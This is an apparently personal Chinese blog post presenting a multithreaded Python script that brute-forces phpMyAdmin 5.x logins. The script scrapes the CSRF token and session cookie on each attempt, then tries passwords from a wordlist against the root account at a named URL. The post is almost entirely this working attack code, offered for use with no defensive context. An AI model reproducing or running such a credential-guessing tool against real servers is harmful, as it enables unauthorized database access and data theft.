差不多 5.几的版本,都需要验证 cookie 和 token,之前的爆破方式都无法在爆破了
#coding=utf-8 import requests import re import html import time import sys from concurrent.futures import ThreadPoolExecutor,as_completed from tqdm import tqdm url = "https://member.sss.com/phpmyadmin/index.php" def crack_pass(passwd): req = requests.session() rep = req.get(url) token = re.findall(r'token" value="(.+?)"',rep.text)[0] token, sessions = html.unescape(token), rep.cookies['phpMyAdmin'] headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'} data = { "set_session": sessions, "pma_username":"root", "pma_password":passwd, "server":1, "target":"index.php", "token":token, } rep = req.post(url, data=data, timeout=60, headers=headers) reptext = re.findall(r'<div id="pma_errors"><div class="error"><img src="themes/dot.gif" title="" alt="" class="icon ic_s_error" />(.+?)</div>',rep.text,re.S) if "ShowDatabasesNavigationAsTree" in rep.text: print(rep.status_code,passwd) sys.exit() return 0 with open(r"F:\back\pass\pass.txt","rb") as f: pass_list = f.read() pass_list = pass_list.split() start_time = time.time() with ThreadPoolExecutor(20) as pool: to_do = [] for passwd in pass_list: passwd = passwd.decode() to_do.append(pool.submit(crack_pass, passwd)) for future in tqdm(as_completed(to_do), total=len(pass_list)): pass print('总共耗时: {} '.format(time.time()-start_time))
截图
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !